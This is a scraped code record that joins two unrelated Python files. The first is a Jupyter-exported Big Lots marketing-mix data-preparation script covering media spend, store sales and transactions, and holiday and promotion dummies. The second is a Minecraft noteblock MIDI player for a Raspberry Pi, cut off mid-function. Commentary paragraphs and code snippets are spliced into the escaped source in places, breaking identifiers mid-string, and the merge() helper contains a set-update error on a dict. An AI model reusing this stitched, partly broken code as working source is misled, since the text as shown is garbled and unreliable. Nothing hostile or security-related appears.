In[7]:\n\ndata_Joann['impression']=data_Joann['impression'].astype(float)\ndata_Joann['click']=data_Joann['click'].astype(float)\ndata_Joann['cost']=data_Joann['cost'].astype(float)\n\n\n# In[8]:\n\n# Replace Q2 TV from Connor because of actualized spend\n\nnew_Q2_TV=pd.read_csv(\"/home/jian/Projects/Big_Lots/TMR/To_Spencer/Up_to_2018Q2/BigLots_Q2_TMR_TV_CC_20181016.csv\",dtype=str)\nnew_Q2_TV=new_Q2_TV[data_Joann.columns.tolist()]\nnew_Q2_TV['week date']=new_Q2_TV['week date'].apply(lambda x: datetime.datetime.strptime(x,\"%m/%d/%Y\").date())\nnew_Q2_TV['impression']=new_Q2_TV['impression'].astype(float)\nnew_Q2_TV['click']=new_Q2_TV['click'].astype(float)\nnew_Q2_TV['cost']=new_Q2_TV['cost'].astype(float)\n\ndata_Joann_Q2_TV=data_Joann[(data_Joann['media']==\"TV\") & (data_Joann['week date']>=datetime.date(2018,5,6)) & (data_Joann['week date']<=datetime.date(2018,8,4))]\ndata_Joann_others=data_Joann[(data_Joann['media']!=\"TV\") | (data_Joann['week date']<datetime.date(2018,5,6)) | (data_Joann['week date']>datetime.date(2018,8,4))]\n\ndata_Joann=data_Joann_others.append(new_Q2_TV)\n\n\n# In[9]:\n\n'''\ndate_range_func={\"week date\":['max','min'],\"impression\":\"sum\",\"click\":\"sum\",\"cost\":\"sum\"}\ndata_Joann.groupby(['media','submedia'])['week date','impression','click','cost'].agg(date_range_func).reset_index()\n'''\n\n\n# In[10]:\n\ndata_Joann=data_Joann[data_Joann['week date']<=datetime.date(2018,7,29)] # week start date\ndata_Joann=data_Joann[data_Joann['week date']>=datetime.date(2016,10,1)]\ndata_Joann['week date']=data_Joann['week date'].astype(str)\n\n\n# In[11]:\n\ndata_Joann.head(2)\n\n\n# In[15]:\n\nemail_all=data_Joann[data_Joann['media']==\"Email\"]\nnon_email_all=data_Joann[data_Joann['media']!=\"Email\"]\nemail_all['cost']=email_all['impression']*0.000455784518529597\ndata_Joann=email_all.append(non_email_all)\n\n\n# In[ ]:\n\n\n\n\n# In[ ]:\n\n\n\n\n# In[16]:\n\ndata_media_national=data_Joann.groupby(['week date','media'])[['impression','click','cost']].sum().reset_index()\n\ndata_sub_media_national=data_Joann.groupby(['week date','media','submedia'])[['impression','click','cost']].sum().reset_index()\ndata_sub_media_national['submedia']=data_sub_media_national['media']+\"_\"+data_sub_media_national['submedia']\ndel data_sub_media_national['media']\n\n\n# In[17]:\n\ndata_sub_media_national['week_start_date']=data_sub_media_national['week date']\ndata_sub_media_national['week_start_date']=data_sub_media_national['week_start_date'].apply(lambda x: datetime.datetime.strptime(x,\"%Y-%m-%d\").date())\ndata_sub_media_national_2018=data_sub_media_national[data_sub_media_national['week_start_date']>=datetime.date(2017,12,31)]\ndata_sub_media_national_2017=data_sub_media_national[data_sub_media_national['week_start_date']<datetime.date(2017,12,31)]\ndata_sub_media_national_2017_Non_NationalTV=data_sub_media_national_2017[data_sub_media_national_2017['submedia']!=\"TV_National\"]\ndata_sub_media_national_2017_NationalTV=data_sub_media_national_2017[data_sub_media_national_2017['submedia']==\"TV_National\"]\n\n\n# In[18]:\n\nNational_TV_2017['week date']=np.nan\nNational_TV_2017['click']=0\ndata_sub_media_national_2017_NationalTV=National_TV_2017[['week date','submedia','impression','click','cost','week_start_date']]\ndata_sub_media_national_2017_NationalTV['submedia']=\"TV_National\"\n\ndata_sub_media_national_2017_NationalTV['week 
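The email rows above get their cost imputed from impressions at a flat per-impression rate rather than read from the source file (the script header notes email cost was still to be allocated). The rate works out to roughly $0.456 per thousand impressions; for a hypothetical two million impressions:

```python
rate = 0.000455784518529597   # imputed cost per email impression, from the script above
impressions = 2_000_000       # hypothetical weekly volume
print(round(impressions * rate, 2))  # 911.57
```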
date']=data_sub_media_national_2017_NationalTV['week_start_date'].astype(str)\ndata_sub_media_national_2017_NationalTV=data_sub_media_national_2017_NationalTV.groupby(['week date','submedia','week_start_date'])['impression','click','cost'].sum().reset_index()\n\n\n# In[19]:\n\ndata_sub_media_national=data_sub_media_national_2017_Non_NationalTV.append(data_sub_media_national_2017_NationalTV).append(data_sub_media_national_2018)\ndata_sub_media_national=data_sub_media_national.reset_index()\ndel data_sub_media_national['index']\n\n\n# In[20]:\n\ndata_sub_media_national_2017_NationalTV.head(2)\n\n\n# In[21]:\n\ndef pivot_level_media(level,df_input):\n df_impr=df_input[['week date',level,'impression']]\n df_impr=df_impr.pivot_table(index='week date',columns=level,values='impression').reset_index()\n for col in df_impr.columns.tolist()[1:]:\n df_impr=df_impr.rename(columns={col:col+\"_impr\"})\n \n df_click=df_input[['week date',level,'click']]\n df_click=df_click.pivot_table(index='week date',columns=level,values='click').reset_index()\n for col in df_click.columns.tolist()[1:]:\n df_click=df_click.rename(columns={col:col+\"_click\"})\n \n df_cost=df_input[['week date',level,'cost']]\n df_cost=df_cost.pivot_table(index='week date',columns=level,values='cost').reset_index()\n for col in df_cost.columns.tolist()[1:]:\n df_cost=df_cost.rename(columns={col:col+\"_cost\"})\n \n result=pd.merge(df_impr,df_click,on=\"week date\",how=\"outer\")\n result=pd.merge(result,df_cost,on=\"week date\",how=\"outer\")\n result=result.fillna(0)\n return result\n\n\n# In[22]:\n\ndata_media_national_wide=pivot_level_media('media',data_media_national)\ndata_submedia_national_wide=pivot_level_media('submedia',data_sub_media_national)\n\n\n# In[23]:\n\ndata_media_dma=data_Joann.groupby(['week date','media','cleaned dma'])[['impression','click','cost']].sum().reset_index()\ndata_media_dma=data_media_dma[data_media_dma['cleaned dma']!=\"National\"]\ndata_media_dma=data_media_dma[data_media_dma['cleaned dma']!=\"xx\"]\ndata_sub_media_dma=data_Joann.groupby(['week date','media','submedia','cleaned dma'])[['impression','click','cost']].sum().reset_index()\ndata_sub_media_dma['submedia']=data_sub_media_dma['media']+\"_\"+data_sub_media_dma['submedia']\ndel data_sub_media_dma['media']\ndata_sub_media_dma=data_sub_media_dma[data_sub_media_dma['cleaned dma']!=\"National\"]\ndata_sub_media_dma=data_sub_media_dma[data_sub_media_dma['cleaned dma']!=\"xx\"]\n\ndata_media_dma['week date']=data_media_dma['week date']+\"|\"+data_media_dma['cleaned dma']\ndel data_media_dma['cleaned dma']\n\ndata_sub_media_dma['week date']=data_sub_media_dma['week date']+\"|\"+data_sub_media_dma['cleaned dma']\ndel data_sub_media_dma['cleaned dma']\n\n\n# In[24]:\n\ndata_media_dma_wide=pivot_level_media('media',data_media_dma)\ndata_media_dma_wide['cleaned dma']=data_media_dma_wide['week date'].apply(lambda x: x.split(\"|\")[1])\ndata_media_dma_wide['week date']=data_media_dma_wide['week date'].apply(lambda x: x.split(\"|\")[0])\n\ndata_submedia_dma_wide=pivot_level_media('submedia',data_sub_media_dma)\ndata_submedia_dma_wide['cleaned dma']=data_submedia_dma_wide['week date'].apply(lambda x: x.split(\"|\")[1])\ndata_submedia_dma_wide['week date']=data_submedia_dma_wide['week date'].apply(lambda x: x.split(\"|\")[0])\n\n\n# In[ ]:\n\n\n\n\n# In[ ]:\n\ndata_media_national_wide['week date']=data_media_national_wide['week date'].apply(lambda x:datetime.datetime.strptime(x,\"%Y-%m-%d\").date())\ndata_submedia_national_wide['week 
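`pivot_level_media()` above turns the long impression/click/cost table into one wide row per week, suffixing each pivoted column with its metric and filling missing media/week combinations with zero. A toy run with made-up numbers:

```python
import pandas as pd

long_df = pd.DataFrame({
    'week date': ['2018-01-07', '2018-01-07', '2018-01-14'],
    'media': ['TV', 'Email', 'TV'],
    'impression': [100.0, 40.0, 120.0],
    'click': [0.0, 5.0, 0.0],
    'cost': [10.0, 1.0, 12.0],
})
wide = pivot_level_media('media', long_df)  # function defined above
print(wide.columns.tolist())
# ['week date', 'Email_impr', 'TV_impr', 'Email_click', 'TV_click', 'Email_cost', 'TV_cost']
```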
date']=data_submedia_national_wide['week date'].apply(lambda x:datetime.datetime.strptime(x,\"%Y-%m-%d\").date())\n\ndata_media_dma_wide['week date']=data_media_dma_wide['week date'].apply(lambda x:datetime.datetime.strptime(x,\"%Y-%m-%d\").date())\ndata_submedia_dma_wide['week date']=data_submedia_dma_wide['week date'].apply(lambda x:datetime.datetime.strptime(x,\"%Y-%m-%d\").date())\n\n\n# # Sales & Transaction\n\n# In[ ]:\n\nfolder_file_pattern=glob.glob(\"/home/jian/Projects/Big_Lots/Sales_All/Sales_Data/*.txt\")\nsales_all=pd.DataFrame()\n\nfor file in folder_file_pattern:\n df=pd.read_csv(file,sep=\"|\",dtype=str,na_values=\"?\")\n\n if \"class_code_id\" in df.columns:\n try:\n df['week_end_dt']=df['week_end_dt'].apply(lambda x: datetime.datetime.strptime(x,\"%Y-%m-%d\").date())\n \n except:\n print(file,\"Date Error\")\n\n \n else:\n print(file,\"Error: class_code_id not in columns\")\n \n sales_all=sales_all.append(df)\n \nsales_all['class_gross_sales_amt']=sales_all['class_gross_sales_amt'].astype(float)\nsales_all['class_gross_sales_amt']=sales_all['class_gross_sales_amt'].fillna(0.0)\nsales_all['subclass_gross_sales_amt']=sales_all['subclass_gross_sales_amt'].astype(float)\nsales_all['subclass_gross_sales_amt']=np.where(pd.isnull(sales_all['subclass_gross_sales_amt']),sales_all['class_gross_sales_amt'],sales_all['subclass_gross_sales_amt'])\n\ntrans_all=sales_all.copy()\nsales_all=sales_all[(sales_all['week_end_dt']<=datetime.date(2018,8,4)) & (sales_all['week_end_dt']>=datetime.date(2016,10,8))] \nsales_all=sales_all.drop_duplicates()\necommerce_sales=sales_all[sales_all['location_id']==\"6990\"]\nsales_all=sales_all[sales_all['location_id']!=\"6990\"]\nsales_all=sales_all[sales_all['location_id']!=\"145\"]\n\n\n# In[ ]:\n\ntrans_all=trans_all[['location_id','week_end_dt','gross_transaction_cnt']].drop_duplicates()\ntrans_all['gross_transaction_cnt']=trans_all['gross_transaction_cnt'].astype(int)\ntrans_all['week_end_dt']=trans_all['week_end_dt'].astype(str)\ntrans_all_0429=trans_all[trans_all['week_end_dt']==\"2017-04-29\"]\ntrans_all_0429['week_end_dt']=\"2017-05-06\"\ntrans_all_0429=trans_all_0429.rename(columns={\"gross_transaction_cnt\":\"0429\"})\n\ntrans_all_0513=trans_all[trans_all['week_end_dt']==\"2017-05-13\"]\ntrans_all_0513['week_end_dt']=\"2017-05-06\"\ntrans_all_0513=trans_all_0513.rename(columns={\"gross_transaction_cnt\":\"0513\"})\n\ntrans_all_0506=pd.merge(trans_all_0429,trans_all_0513,on=['location_id','week_end_dt'],how=\"outer\")\ntrans_all_0506=trans_all_0506.fillna(0)\ntrans_all_0506['gross_transaction_cnt']=(trans_all_0506['0429']+trans_all_0506['0513'])/2\ntrans_all_0506=trans_all_0506[['location_id','week_end_dt','gross_transaction_cnt']]\n\ntrans_all_exc=trans_all[trans_all['week_end_dt']!=\"2017-05-06\"]\ntrans_data=trans_all_exc.append(trans_all_0506)\ntrans_data=trans_data.sort_values(['location_id','week_end_dt'])\n# trans_data['week_end_dt']=trans_data['week_end_dt'].apply(lambda x: datetime.datetime.strptime(x,\"%Y-%m-%d\").date())\n\necommerce_trans=trans_data[trans_data['location_id']==\"6990\"]\ntrans_data=trans_data[trans_data['location_id']!=\"6990\"]\ntrans_data=trans_data[trans_data['location_id']!=\"145\"]\n\n\n# In[ ]:\n\nstore_DMA=pd.read_excel(\"/home/jian/Projects/Big_Lots/Other_Input/all_store_DMA_20180726.xlsx\",dtype=str)\nstore_DMA=store_DMA[['location_id','cleaned_dma']].rename(columns={\"cleaned_dma\":\"cleaned dma\"})\n# dma_clean=pd.read_excel(\"/home/jian/Projects/Big_Lots/Other_Input/DMA cleaning.xlsx\",dtype=str)\n\n\n# 
In[ ]:\n\nsales_all_by_store=sales_all.groupby(['location_id','week_end_dt'])['subclass_gross_sales_amt'].sum().to_frame().reset_index()\nsales_all_by_store=pd.merge(sales_all_by_store,store_DMA,on=\"location_id\",how=\"left\")\ntrans_data['week_end_dt']=trans_data['week_end_dt'].apply(lambda x: datetime.datetime.strptime(x,\"%Y-%m-%d\").date())\n\ntransaction_sales_data=pd.merge(sales_all_by_store,trans_data,on=['location_id','week_end_dt'],how=\"left\")\n\n\n# In[ ]:\n\ntransaction_sales_data['subclass_gross_sales_amt'].apply(lambda x: type(x)).unique()\n\n\n# In[ ]:\n\ntransaction_sales_data_dma=transaction_sales_data.groupby(['cleaned dma','week_end_dt'])[['subclass_gross_sales_amt','gross_transaction_cnt']].sum().reset_index()\n\ntransaction_sales_data_dma=transaction_sales_data_dma[(transaction_sales_data_dma['week_end_dt']>=datetime.date(2016,10,8)) & (transaction_sales_data_dma['week_end_dt']<=datetime.date(2018,8,4))]\ntransaction_sales_data_dma=transaction_sales_data_dma.rename(columns={\"subclass_gross_sales_amt\":\"sales\",'gross_transaction_cnt':\"trans\"})\ntransaction_sales_data_dma['week date']=transaction_sales_data_dma['week_end_dt'].apply(lambda x: x-datetime.timedelta(days=6))\n\ndel transaction_sales_data_dma['week_end_dt']\ntransaction_sales_data_national=transaction_sales_data_dma.groupby(['week date'])['sales','trans'].sum().reset_index()\n\n\n# In[ ]:\n\nstore_counts_dma=sales_all_by_store[sales_all_by_store['subclass_gross_sales_amt']>0]\nstore_counts_dma=store_counts_dma.groupby(['cleaned dma','week_end_dt'])['location_id'].count().to_frame().reset_index()\nstore_counts_dma=store_counts_dma.rename(columns={\"location_id\":\"store_count\"})\nstore_counts_dma['week date']=store_counts_dma['week_end_dt'].apply(lambda x: x-datetime.timedelta(days=6))\n\n\nstore_counts_national=store_counts_dma.groupby(['week_end_dt'])['store_count'].sum().to_frame().reset_index()\n\nstore_counts_dma['week date']=store_counts_dma['week_end_dt'].apply(lambda x: x-datetime.timedelta(days=6))\nstore_counts_national['week date']=store_counts_national['week_end_dt'].apply(lambda x: x-datetime.timedelta(days=6))\n\ndel store_counts_dma['week_end_dt']\ndel store_counts_national['week_end_dt']\n\n\n# In[ ]:\n\nMMM_national_media=pd.merge(data_media_national_wide,store_counts_national,on=\"week date\",how=\"left\")\nMMM_national_media=pd.merge(MMM_national_media,transaction_sales_data_national,on=\"week date\",how=\"left\")\n\nMMM_dma_media=pd.merge(data_media_dma_wide,store_counts_dma,on=[\"week date\",\"cleaned dma\"],how=\"left\")\nMMM_dma_media=pd.merge(MMM_dma_media,transaction_sales_data_dma,on=[\"week date\",\"cleaned dma\"],how=\"left\")\n\nMMM_national_sub_media=pd.merge(data_submedia_national_wide,store_counts_national,on=\"week date\",how=\"left\")\nMMM_national_sub_media=pd.merge(MMM_national_sub_media,transaction_sales_data_national,on=\"week date\",how=\"left\")\n\nMMM_dma_sub_media=pd.merge(data_submedia_dma_wide,store_counts_dma,on=[\"week date\",\"cleaned dma\"],how=\"left\")\nMMM_dma_sub_media=pd.merge(MMM_dma_sub_media,transaction_sales_data_dma,on=[\"week date\",\"cleaned dma\"],how=\"left\")\n\n\n# In[ ]:\n\nMMM_national_media=MMM_national_media.sort_values(['week date'])\nMMM_dma_media=MMM_dma_media.sort_values(['week date','cleaned dma'])\nMMM_national_sub_media=MMM_national_sub_media.sort_values(['week date'])\nMMM_dma_sub_media=MMM_dma_sub_media.sort_values(['week date','cleaned dma'])\n\ndef order_columns(df):\n iv_list=[col for col in df.columns.tolist() if \"_\" in 
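The weekly joins above key media rows (dated by week start) against sales rows (dated by `week_end_dt`), which is why the shift `x - datetime.timedelta(days=6)` recurs throughout. Given the date filters in the script, week ends fall on Saturdays and week starts on the preceding Sundays:

```python
import datetime

week_end = datetime.date(2018, 7, 28)                    # a Saturday week end
week_start = week_end - datetime.timedelta(days=6)
print(week_start)                                        # 2018-07-22, the Sunday join key
```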
col]\n dv_list=[col for col in df.columns.tolist() if \"_\" not in col]\n df=df[dv_list+iv_list]\n return df\nMMM_national_media=order_columns(MMM_national_media)\nMMM_dma_media=order_columns(MMM_dma_media)\nMMM_dma_media=MMM_dma_media[~pd.isnull(MMM_dma_media['sales'])]\nMMM_national_sub_media=order_columns(MMM_national_sub_media)\nMMM_dma_sub_media=order_columns(MMM_dma_sub_media)\nMMM_dma_sub_media=MMM_dma_sub_media[~pd.isnull(MMM_dma_sub_media['sales'])]\n\n'''\nMMM_national_media.to_csv(writer_folder+\"BL_MMM_national_media_JL_\"+today_str+\".csv\",index=False)\nMMM_dma_media.to_csv(writer_folder+\"BL_MMM_dma_media_JL_\"+today_str+\".csv\",index=False)\nMMM_national_sub_media.to_csv(writer_folder+\"BL_MMM_national_sub_media_JL_\"+today_str+\".csv\",index=False)\nMMM_dma_sub_media.to_csv(writer_folder+\"BL_MMM_dma_sub_media_JL_\"+today_str+\".csv\",index=False)\n'''\n\n\n# In[ ]:\n\necommerce_trans_by_week=ecommerce_trans[['week_end_dt','gross_transaction_cnt']].rename(columns={\"gross_transaction_cnt\":\"e_transaction\"})\necommerce_trans_by_week['week_end_dt']=ecommerce_trans_by_week['week_end_dt'].apply(lambda x: datetime.datetime.strptime(x,\"%Y-%m-%d\").date())\necommerce_trans_by_week['week date']=ecommerce_trans_by_week['week_end_dt'].apply(lambda x: x-datetime.timedelta(days=6))\necommerce_trans_by_week=ecommerce_trans_by_week[['week date','e_transaction']]\n\n\n\n# In[ ]:\n\necommerce_sales_by_week=ecommerce_sales.groupby(['week_end_dt'])['subclass_gross_sales_amt'].sum().to_frame().reset_index()\necommerce_sales_by_week=ecommerce_sales_by_week.rename(columns={\"subclass_gross_sales_amt\":\"e_sales\"})\necommerce_sales_by_week['week date']=ecommerce_sales_by_week['week_end_dt'].apply(lambda x: x-datetime.timedelta(days=6))\necommerce_sales_by_week=ecommerce_sales_by_week[['week date','e_sales']]\necommerce_sales_by_week.head(2)\n\n\n# In[ ]:\n\necommerce_trans_by_week.tail(2)\n\n\n# In[ ]:\n\nMMM_national_media=pd.merge(MMM_national_media,ecommerce_sales_by_week,on=\"week date\",how=\"left\")\nMMM_national_media=pd.merge(MMM_national_media,ecommerce_trans_by_week,on=\"week date\",how=\"left\")\n\nMMM_national_sub_media=pd.merge(MMM_national_sub_media,ecommerce_sales_by_week,on=\"week date\",how=\"left\")\nMMM_national_sub_media=pd.merge(MMM_national_sub_media,ecommerce_trans_by_week,on=\"week date\",how=\"left\")\n\n\n# In[ ]:\n\nBinary_List_1=[datetime.date(2016,12,18),datetime.date(2017,12,17)]\n\nBinary_List_2_16=[datetime.date(2016,11,20)+datetime.timedelta(days=x*7) for x in range(5)]\nBinary_List_2_17=[datetime.date(2017,11,19)+datetime.timedelta(days=x*7) for x in range(5)]\nBinary_List_2=Binary_List_2_16+Binary_List_2_17\n\nMMM_national_media['Holiday_1_week_only_Ind']=np.where(np.isin(MMM_national_media['week date'],Binary_List_1),1,0)\nMMM_national_media['Holiday_5_weeks_Indicator']=np.where(np.isin(MMM_national_media['week date'],Binary_List_2),1,0)\n\nMMM_dma_media['Holiday_1_week_only_Ind']=np.where(np.isin(MMM_dma_media['week date'],Binary_List_1),1,0)\nMMM_dma_media['Holiday_5_weeks_Indicator']=np.where(np.isin(MMM_dma_media['week date'],Binary_List_2),1,0)\n\nMMM_national_sub_media['Holiday_1_week_only_Ind']=np.where(np.isin(MMM_national_sub_media['week date'],Binary_List_1),1,0)\nMMM_national_sub_media['Holiday_5_weeks_Indicator']=np.where(np.isin(MMM_national_sub_media['week date'],Binary_List_2),1,0)\n\nMMM_dma_sub_media['Holiday_1_week_only_Ind']=np.where(np.isin(MMM_dma_sub_media['week 
date'],Binary_List_1),1,0)\nMMM_dma_sub_media['Holiday_5_weeks_Indicator']=np.where(np.isin(MMM_dma_sub_media['week date'],Binary_List_2),1,0)\n\n\n# In[ ]:\n\nMMM_dma_sub_media.head(2)\n\n\n# In[ ]:\n\n# Add the sales 20% dummy variables\nRewards_Promotion_list=[datetime.date(2016,10,1),datetime.date(2016,10,2),\n datetime.date(2017,1,21),datetime.date(2017,1,22),\n datetime.date(2017,4,1),datetime.date(2017,4,2),\n datetime.date(2017,7,8),datetime.date(2017,7,9),\n datetime.date(2017,9,30),datetime.date(2017,10,1),\n datetime.date(2018,1,20),datetime.date(2018,1,21),\n datetime.date(2018,4,7),datetime.date(2018,4,8),\n datetime.date(2018,7,7),datetime.date(2018,7,8)]\ndf_Rewards_Promotion=pd.DataFrame({\"Date\":Rewards_Promotion_list},index=range(len(Rewards_Promotion_list)))\ndf_Rewards_Promotion['weekday']=df_Rewards_Promotion['Date'].apply(lambda x: x.weekday())\ndf_Rewards_Promotion['week date']=np.where(df_Rewards_Promotion['weekday']==6,df_Rewards_Promotion['Date'],df_Rewards_Promotion['Date']-datetime.timedelta(days=6))\n\ndel df_Rewards_Promotion['Date']\n\ndf_Rewards_Promotion_Sunday=df_Rewards_Promotion[df_Rewards_Promotion['weekday']==6]\ndf_Rewards_Promotion_Sunday['Sunday_rewards_ind']=1\ndel df_Rewards_Promotion_Sunday['weekday']\ndf_Rewards_Promotion_Saturday=df_Rewards_Promotion[df_Rewards_Promotion['weekday']==5]\ndf_Rewards_Promotion_Saturday['Saturday_rewards_ind']=1\ndel df_Rewards_Promotion_Saturday['weekday']\n\n\n# In[ ]:\n\n\n\n\n# In[ ]:\n\nMMM_national_media=pd.merge(MMM_national_media,df_Rewards_Promotion_Saturday,on=\"week date\",how=\"left\")\nMMM_national_media=pd.merge(MMM_national_media,df_Rewards_Promotion_Sunday,on=\"week date\",how=\"left\")\nMMM_national_media=MMM_national_media.fillna(0)\n\nMMM_dma_media=pd.merge(MMM_dma_media,df_Rewards_Promotion_Saturday,on=\"week date\",how=\"left\")\nMMM_dma_media=pd.merge(MMM_dma_media,df_Rewards_Promotion_Sunday,on=\"week date\",how=\"left\")\nMMM_dma_media=MMM_dma_media.fillna(0)\n\nMMM_national_sub_media=pd.merge(MMM_national_sub_media,df_Rewards_Promotion_Saturday,on=\"week date\",how=\"left\")\nMMM_national_sub_media=pd.merge(MMM_national_sub_media,df_Rewards_Promotion_Sunday,on=\"week date\",how=\"left\")\nMMM_national_sub_media=MMM_national_sub_media.fillna(0)\n\nMMM_dma_sub_media=pd.merge(MMM_dma_sub_media,df_Rewards_Promotion_Saturday,on=\"week date\",how=\"left\")\nMMM_dma_sub_media=pd.merge(MMM_dma_sub_media,df_Rewards_Promotion_Sunday,on=\"week date\",how=\"left\")\nMMM_dma_sub_media=MMM_dma_sub_media.fillna(0)\n\n\n# In[ ]:\n\n\n\n\n# In[ ]:\n\nMMM_national_media.to_csv(writer_folder+\"BL_MMM_national_media_JL_\"+today_str+\".csv\",index=False)\nMMM_dma_media.to_csv(writer_folder+\"BL_MMM_dma_media_JL_\"+today_str+\".csv\",index=False)\nMMM_national_sub_media.to_csv(writer_folder+\"BL_MMM_national_sub_media_JL_\"+today_str+\".csv\",index=False)\nMMM_dma_sub_media.to_csv(writer_folder+\"BL_MMM_dma_sub_media_JL_\"+today_str+\".csv\",index=False)\n\n\n# In[ ]:\n\ndata_Joann.to_csv(writer_folder+\"BL_MMM_long_JL_\"+today_str+\".csv\",index=False)\n\n\n# In[ ]:\n\n\n\n","repo_name":"jubaplus2/jian_projects","sub_path":"code_back_up/backuped_on_sharefolder_2021-01-06_000/00498_TMR_2018Q2_20181026.py","file_name":"00498_TMR_2018Q2_20181026.py","file_ext":"py","file_size_in_byte":22224,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"35791729126","text":"# -*- coding: utf-8 -*-\n\nfrom config import NULL\n\nimport RPi.GPIO as GPIO\n\n# MCAPI\nfrom 
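The holiday flags above all follow one pattern: `np.isin()` tests each week-start date against a list of dates, and `np.where()` converts the boolean mask into a 0/1 indicator column. A minimal check of that pattern:

```python
import datetime
import numpy as np
import pandas as pd

weeks = pd.Series([datetime.date(2016, 12, 11), datetime.date(2016, 12, 18)])
holidays = [datetime.date(2016, 12, 18), datetime.date(2017, 12, 17)]
ind = np.where(np.isin(weeks, holidays), 1, 0)
print(ind)  # [0 1]
```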
mcpi import block\n\n# EventKind\nfrom enum import Enum, auto\n\n# MIDINotes\nimport os\nimport time\nfrom collections import defaultdict\n#from multiprocessing import Process as Proc, SimpleQueue as Queue\nfrom threading import Thread as Proc\nfrom queue import Queue\nimport midi\n\nC2 = 2 ** (1/3)\nC4 = 4 ** (1/3)\nNOTE_12 = [1, 16384*C2/19683, 8*C2/9, 32/27,\n64*C4/81, 4/3, 1024/729, 32*C2/27, 8192*C2/6561, 256*C4/243, 9/(4*C2), 4096/2187]\n\n#NOTES = [440 * (2 ** ((note - 69)/12)) for note in range(120)]\nNOTES = [261.6255653 * (2 ** ((note-60) // 12)) * NOTE_12[note % 12] for note in range(120)]\n\nclass LocalAPI:\n\tdef __init__(self, *args, **kwargs):\n\t\tself.pr = False\n\t\tif 'pr' in kwargs:\n\t\t\tself.pr = kwargs['pr']\n\n\tdef play_note(self, note, on):\n\t\tif self.pr:\n\t\t\tprint(\"Turn {} note {} in MC.\".format('on' if on else 'off', note))\n\n\tdef print(self, msg):\n\t\tprint(\"MC: {}\".format(msg))\n\nclass MCAPI:\n\tNB_ID = block.NOTEBLOCK.id\n\tRS_ID = block.REDSTONE_BLOCK.id\n\tEMPTY_ID = block.AIR.id\n\n\tLOW_ID = block.WOOD.id\n\tHIGH_ID = block.GOLD_BLOCK.id\n\n\tNOTE_NUM = 72 + 1\n\n\tdef __init__(self, mc, x, y, z, pr = False): # pr: For compatibility.\n\t\tself.mc = mc\n\t\tself.pl = mc.player\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.z = z\n\t\tself.init()\n\n\tdef init(self):\n\t\tx, y, z, mc = self.x, self.y, self.z, self.mc\n\t\tmc.setBlocks(x, y - 1, z - 2, x + 24, y + 1, z + 2, self.EMPTY_ID)\n\t\tmc.setBlocks(x, y - 1, z - 1, x + 24, y - 1, z - 1, self.LOW_ID)\n\t\tmc.setBlocks(x, y - 1, z + 1, x + 24, y - 1, z + 1, self.HIGH_ID)\n\t\tfor note in range(25):\n\t\t\tfor i in (-1, 0, 1):\n\t\t\t\tmc.setBlockWithNBT(x + note, y, z + i, self.NB_ID, 0, '{note:%d}' % note)\n\t\t'''\n\t\tmc.setBlocks(x, y - 4, z - 1, x + 24, y + 4, z + 1, 0)\n\t\tmc.setBlocks(x, y - 4, z, x + 24, y - 4, z, LOW_ID)\n\t\tmc.setBlocks(x, y + 2, z, x + 24, y + 2, z, HIGH_ID)\n\t\tfor note in range(25):\n\t\t\tfor i in [-3, 0, 3]:\n\t\t\t\tmc.setBlockWithNBT(x + note, y + i, z, NB_ID, 0, '{note:%d}' % note)\n\t\t'''\n\t\t'''\n\t\tfor note in range(NOTE_NUM):\n\t\t\tmc.setBlockWithNBT(x + note, y, z, NB_ID, 0, '{note:%d}' % note)\n\t\t'''\n\n\tdef rb_pos(self, note):\n\t\ty_shift = 0\n\t\tz_shift = 0\n\t\tif note < 24:\n\t\t\t#y_shift = -3\n\t\t\ty_shift = 0\n\t\t\tz_shift = -2\n\t\telif note < 49:\n\t\t\tnote -= 24\n\t\t\t#y_shift = 0\n\t\t\ty_shift = -1\n\t\t\tz_shift = 0\n\t\telse:\n\t\t\tnote -= 48\n\t\t\t#y_shift = 3\n\t\t\ty_shift = 0\n\t\t\tz_shift = 2\n\n\t\treturn self.x + note, self.y + y_shift, self.z + z_shift\n\n\tdef play_note(self, note, on):\n\t\tself.mc.setBlock(*self.rb_pos(note), self.RS_ID if on else self.EMPTY_ID)\n\n\tdef print(self, msg):\n\t\tpls = self.mc.getPlayerEntityIds()\n\t\thasP = False\n\t\tfor pid in pls:\n\t\t\ttry:\n\t\t\t\t# NOTE: CmdPlayer is not imported in this module; it is assumed to come from the mcpi variant in use.\n\t\t\t\tpl = CmdPlayer(self.mc.conn, playerId=pid)\n\t\t\t\tpos = pl.getTilePos()\n\t\t\t\tif pos.x<95 and pos.x>35 and pos.y<30 and pos.z<195 and pos.z>125:\n\t\t\t\t\tself.mc.postToChat(msg)\n\t\t\texcept Exception:\n\t\t\t\tpass\n\nclass EventKind(Enum):\n\tMC = auto()\n\tBUZZER = auto()\n\tLYRIC = auto()\n\nclass MIDINotes:\n\t\"\"\"Extracts note info from MIDIFile\"\"\"\n\tdef __init__(self, file, same_note = True):\n\t\tself.same_note = same_note\n\t\tself._valid = True\n\t\ttry:\n\t\t\tself.process(file)\n\t\texcept Exception as e:\n\t\t\tprint(\"[MIDINotes] Exception occurred while processing '{}':\\n\\t{}\".format(file, e))\n\t\t\tself._valid = False\n\n\t@staticmethod\n\tdef merge(ch_dicts):\n\t\t# Input : list of \"{note:[(t, 
is_on)...]}\"\n\t\tnotes = {}\n\t\tfor ch_dict in ch_dicts:\n\t\t\tnotes |= ch_dict.keys()\n\t\tmerged_dict = {n : [] for n in notes}\n\t\tfor note in notes:\n\t\t\tml = merged_dict[note]\n\t\t\tnlist = [(t, not is_on, i) for i, ch_dict in enumerate(ch_dicts) \\\n\t\t\t\t\t\t\t\t\t\tfor t, is_on in ch_dict.get(note, [])]\n\t\t\tnlist.sort()\n\t\t\ton_channel = set()\n\t\t\tlast_t = -1\n\t\t\tfor t, is_off, i in nlist:\n\t\t\t\tif is_off:\n\t\t\t\t\tassert i in on_channel, \"Error: note {} is off before on!\".format(note)\n\t\t\t\t\ton_channel.remove(i)\n\t\t\t\t\tif not on_channel:\n\t\t\t\t\t\tml.append((t, False))\n\t\t\t\t\t\tassert last_t < t, \"Error: internal error with code 1.\"\n\t\t\t\telse:\n\t\t\t\t\ton_channel.add(i)\n\t\t\t\t\tif last_t < t:\n\t\t\t\t\t\tml.append((t, True))\n\t\t\t\t\t\tlast_t = t\n\n\t\treturn merged_dict\n\n\tdef get_time(self, tick):\n\t\treal_time = 0\n\t\tlast_t, last_r = self.tempos[0]\n\t\tfor t, ratio in 